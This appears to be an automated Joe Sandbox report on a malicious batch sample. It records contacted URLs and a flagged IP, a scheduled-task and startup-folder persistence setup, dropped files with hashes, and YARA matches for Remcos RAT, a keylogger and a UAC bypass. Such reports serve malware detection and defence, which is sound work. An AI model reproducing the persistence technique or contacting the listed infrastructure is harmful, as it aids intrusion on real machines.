                      NameSourceMaliciousAntivirus DetectionReputation
                      https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000013.00000003.2841725862.000001E28ADAE000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.digicert.cDZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.vmware.com/0DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.datanumen.com/zip-repair/AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.symauth.com/rpa00DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.info-zip.org/DZIPR.exe, 0000000F.00000002.2745152463.0000000003511000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.000000000559F000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D26000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.0000000005580000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.vmware.com/0/DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000013.00000003.2841725862.000001E28AD50000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://c0rl.m%LDZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.repairfile.comDZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.symauth.com/cps0(DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://support.datanumen.comDZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      172.94.3.25
                      unknownUnited States
                      3223VOXILITYGBtrue
                      IP
                      127.0.0.1
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1518340
                      Start date and time:2024-09-25 16:02:12 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 20s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:29
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:55Ka50lb6Z.bat
                      renamed because original name is a hash value
                      Original Sample Name:4d8b2d19bdd29e6d89e0769cff9b0b48.bat
                      Detection:MAL
                      Classification:mal100.troj.expl.evad.winBAT@42/32@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 70
                      • Number of non-executed functions: 230
                      Cookbook Comments:
                      • Found application associated with file extension: .bat
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: 55Ka50lb6Z.bat
                      TimeTypeDescription
                      10:03:13API Interceptor88x Sleep call for process: powershell.exe modified
                      10:04:14API Interceptor2x Sleep call for process: svchost.exe modified
                      10:04:24API Interceptor5x Sleep call for process: cmd.exe modified
                      10:04:51API Interceptor1x Sleep call for process: explorer.exe modified
                      16:04:21Task SchedulerRun new task: lnfast_x64 path: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      16:04:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      VOXILITYGBzz91Dcv5Kf.dllGet hashmaliciousRemcosBrowse
                      • 172.94.9.207
                      V9HUU0LCin.dllGet hashmaliciousRemcosBrowse
                      • 172.94.9.207
                      E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                      • 172.94.15.211
                      Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                      • 172.94.15.211
                      af0b876a436452a6e998fc622493aaa4553bcc53864d66a6a6d5d476a85902eb_dump1.exeGet hashmaliciousNanocore, RemcosBrowse
                      • 104.243.242.162
                      zczsJahg5p.exeGet hashmaliciousNanocore, Remcos, PureLog StealerBrowse
                      • 104.243.242.164
                      SLL8zVmaGj.elfGet hashmaliciousUnknownBrowse
                      • 185.247.61.190
                      tfEceyjWwA.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                      • 104.243.242.171
                      UlKVk4jZsk.exeGet hashmaliciousPureLog StealerBrowse
                      • 104.243.242.162
                      9buT5F16iZ.exeGet hashmaliciousPureLog StealerBrowse
                      • 104.243.242.166
                      No context
                      No context
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.7516129642855441
                      Encrypted:false
                      SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0X:9JZj5MiKNnNhoxub
                      MD5:EDE026B2FF78D29BF20A2A1E6C295D57
                      SHA1:9B31DF81FF979E8ED89DCE2F580AA5B0F959623E
                      SHA-256:F2D0B9D6637D9892B4D5959ECC23F255688929159B53C255719F0C3E5F63CB83
                      SHA-512:4BA15135903F3FA7DB72F16471A397219694181A589BB8E0CDFFD2DBD358100E8F0A226A337EE43EE6CB467EE6441173048A8C1EE4AF92F8B623F60E2ADA861B
                      Malicious:false
                      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                      Process:C:\Windows\System32\svchost.exe
                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x012569d2, page size 16384, DirtyShutdown, Windows version 10.0
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.7555892334743011
                      Encrypted:false
                      SSDEEP:1536:lSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:lazaSvGJzYj2UlmOlOL
                      MD5:BA908786CB88453C2528527D7C2B9049
                      SHA1:46627465BC5139CE7D4B0558A0E97B707C638025
                      SHA-256:14DCDC5731B3CE423B2A8F481FE1821221801C45B40F22084452E3B3042A0CD0
                      SHA-512:C23F5139EFB3B1CCAACC11243E946240EA701A980153C91D6944594EC94062A545346CC77CA35984CEE03141BA2248F5420D4A046907FA02AF5E7FF31C3CFF59
                      Malicious:false
                      Preview:.%i.... .......7.......X\...;...{......................0.e......!...{?......|a.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..........................................|a..................W.......|a..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.07984105005364
                      Encrypted:false
                      SSDEEP:3:sE1yYeceJt3Kg3NaAPaU1lTKAtl/lAlluxmO+l/SNxOf:sjzHKANDPaUbZtAgmOH
                      MD5:141861E603ACE88C12B388D03B7DFB18
                      SHA1:4004E1FF17D9A0C5122A3ADDF74953159DBF11E1
                      SHA-256:143C745DD786D130E64FD1A97975EE17A8E124490A17B5FFC840B2C2DBDEE8FC
                      SHA-512:47E296E548D044C27AC1A2D25D4DCD842BA766359950372655B8E2A1CE0FB7333BD21858770CACFA7797F15493658DD4353CA031BA41D0F7CA72241B755279D6
                      Malicious:false
                      Preview:.........................................;...{.......|a..!...{?..........!...{?..!...{?..g...!...{?..................W.......|a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):9434
                      Entropy (8bit):4.928515784730612
                      Encrypted:false
                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                      MD5:D3594118838EF8580975DDA877E44DEB
                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                      Malicious:false
                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):0.34726597513537405
                      Encrypted:false
                      SSDEEP:3:Nlll:Nll
                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                      Malicious:false
                      Preview:@...e...........................................................
                      Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1234044
                      Entropy (8bit):7.662461501341374
                      Encrypted:false
                      SSDEEP:24576:29gkqJElhex4JxOGn5LUw7ubDs7qWToVbRTx:29g0exADLuXQHot
                      MD5:92D073FB1F41B4EB75090198FECFF04D
                      SHA1:EC64425F18FCA2D451C1EC84979330E8126BA248
                      SHA-256:48E92CC7972F576C149A5FB4BE70A6A14FF3F87D9ED54D1FE905CFCECE534D1C
                      SHA-512:9E05704DDE4EA3D6BC93AD62AD1B0F7A8049AB12F8FCD8F723E470A97C75C8F202A63988ED5D58EF05F58694831476F627926EB083F2C5513EDD708E84D25BDB
                      Malicious:false
                      Preview:n@x.l@x.l@x.m@x.l@x.)@x.y@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@y.H.(.).,.H.5..2...&..:)...7..>4...`5..5$../...-..>4...5..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../1..4...)..(8x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../;..!..$.......m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.H.1.).*.1..../...4V.(.$..!.../..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x..rV.CuH._wx.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1234044
                      Entropy (8bit):7.662460929035292
                      Encrypted:false
                      SSDEEP:24576:+9gkqJElhex4JxOGn5LUw7ubDs7qWToVbRTx:+9g0exADLuXQHot
                      MD5:94DBA9BBE1B5D782E3E25F4DF3AC607C
                      SHA1:DC2B86C2C891938FAF58BA4C3E2911B829815820
                      SHA-256:6435AA646B08E38425E6A12C3D046DB131B923C3C01D3489BDC8C96ADFA56588
                      SHA-512:C2A254BCE51D284E3F64DA90B1EDAC0F82C999CBB90CE90B3D69C60E34DA5CFA5EF5A2E1F096FBBAAE9076A91B8610499D8FF1EC35A565674DF745265CE3F3B0
                      Malicious:false
                      Preview:n@x.l@x.l@x.m@x.l@x.)@x.y@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@y.H.(.).,.H.5..2...&..:)...7..>4...`5..5$../...-..>4...5..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../1..4...)..(8x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../;..!..$.......m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.H.1.).*.1..../...4V.(.$..!.../..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x..rV.CuH._wx.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.
                      Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1234044
                      Entropy (8bit):7.6624612503315905
                      Encrypted:false
                      SSDEEP:24576:t9gkqJElhex4JxOGn5LUw7ubDs7qWToVbRTx:t9g0exADLuXQHot
                      MD5:F443C8A9C19FEBCFB401524451CDAD9C
                      SHA1:393B05AE3F6CD6065FE579DBD2ADF242651CD343
                      SHA-256:DB926DD230E09696D7A5FAB95BCD46D20C9FFB93EE638782279D254EDA53F81A
                      SHA-512:CDDA03469A1880CB5FC0D9834B36F09E330312C5CCB0F9403FB4D87AC0BEF8E81F852C361D685816B683E3686FC17C6B63105C84BD53EB467F29CA97479C667D
                      Malicious:false
                      Preview:n@x.l@x.l@x.m@x.l@x.)@x.y@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@y.H.(.).,.H.5..2...&..:)...7..>4...`5..5$../...-..>4...5..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../1..4...)..(8x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x../;..!..$.......m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.H.1.).*.1..../...4V.(.$..!.../..m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x..rV.CuH._wx.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.m@x.
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):500224
                      Entropy (8bit):6.590620352205087
                      Encrypted:false
                      SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                      MD5:6CA401F82443B673FCA7D7DDB0A05357
                      SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                      SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: unknown
